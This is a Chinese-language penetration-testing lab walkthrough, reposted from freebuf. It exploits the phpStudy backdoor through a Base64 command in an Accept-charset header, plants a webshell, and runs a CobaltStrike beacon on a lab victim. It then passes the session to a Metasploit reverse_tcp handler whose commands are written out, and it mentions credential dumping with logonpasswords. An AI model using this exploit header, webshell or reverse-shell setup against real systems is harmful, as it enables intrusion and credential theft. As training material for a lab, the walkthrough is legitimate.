CobaltStrike和MSF联动 – 作者:lyjsyqw

0x00写在前面

本次测试文章仅供学习使用,如若非法他用,与本文作者无关,需自行负责!

因学未深,技未精,故水平有限,还请各位大佬勿喷!

0x00环境介绍

攻击机:192.168.60.129 (kali)

受害机:192.168.60.131

网关:192.168.60.2

工具:metaspolit、cobaltstrike、burp

0x01攻击准备

首先在受害服务器部署有后门的phpstudy程序

图片[1]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

接下来部署web应用服务,搞的看起来像是真实的应用服务器一样哈

图片[2]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

0x02前攻击阶段

通过信息收集发现泄漏phpinfo配置信息,后端部署程序为phpstudy

图片[3]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

尝试使用phpstudy漏洞利用poc

Accept-Encoding: gzip,deflate

Accept-charset: c3lzdGVtKCduZXQgdXNlcicpOw==

图片[4]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

使用命令执行写入一句话,获取webshell

编码执行的命令

图片[5]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

写入一句话

图片[6]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

连接shell(如果连接的时候出现问题可以尝试使用其他的webshell工具进行连接,这里使用的是中国菜刀)

图片[7]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

中国蚁剑连接失败图片[8]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

接近着神器1Cobaltstrike上场

启动命令为./teamserver ip 密码

图片[9]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

输入./cobaltstrike启用程序,输入IP和端口,用户名随意,密码输入启用服务设置的密码

图片[10]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

进入之后选择Cobaltstrike–listeners进入监听界面:

图片[11]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

然后点击下方的add添加配置:

图片[12]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

接下来进行payload后门制作,选择Windows executable

图片[13]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

由于暂时没有做免杀,杀毒软件会放到隔离区

图片[14]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

为了测试的正常操作需要,不得不把后门文件从隔离区恢复到信任区,随后通过拿到的webshell上传后门程序

图片[15]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

0x02后渗透阶段

受害服务器运行后门程序获得回显:

图片[16]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

cobaltstrike里面集成了各种攻击插件

例如:直接输入logonpasswords可以获取用户密码,这里由于现在的权限比较低没有获取到用户和密码

图片[17]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

如果觉得功能太少,也可以和msf联

接近着神器2 Metaspolit上场

首先打开msf,进行常规的监听设置

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.60.129

set LPORT 9999

run

图片[18]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

在Cobaltstrike新建一个监听,配置如下:

图片[19]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

这里需要注意是payload选中的是foreign目录下的而不是beacon,区别就是前者是提供给外部监听,后者是内置监听。

配置完成后在选中目标右键单击spawn,然后选择刚建立好的监听,然后在msf就可以看见已经获取回显。

图片[20]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

可以看到MSF获取到了Meterpreter会话

图片[21]-CobaltStrike和MSF联动 – 作者:lyjsyqw-安全小百科

最后可以使用Meterpreter中集成的后渗透模块进行进一步的测试。

0x03总结思考

在测试过程中需要不断的积累测试思路和经验,尝试新鲜的方法,在遇到新的问题或疑惑时跳出问题去全局思考这样会有意向不到的收获!

来源:freebuf.com 2020-09-24 15:23:35 by: lyjsyqw

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论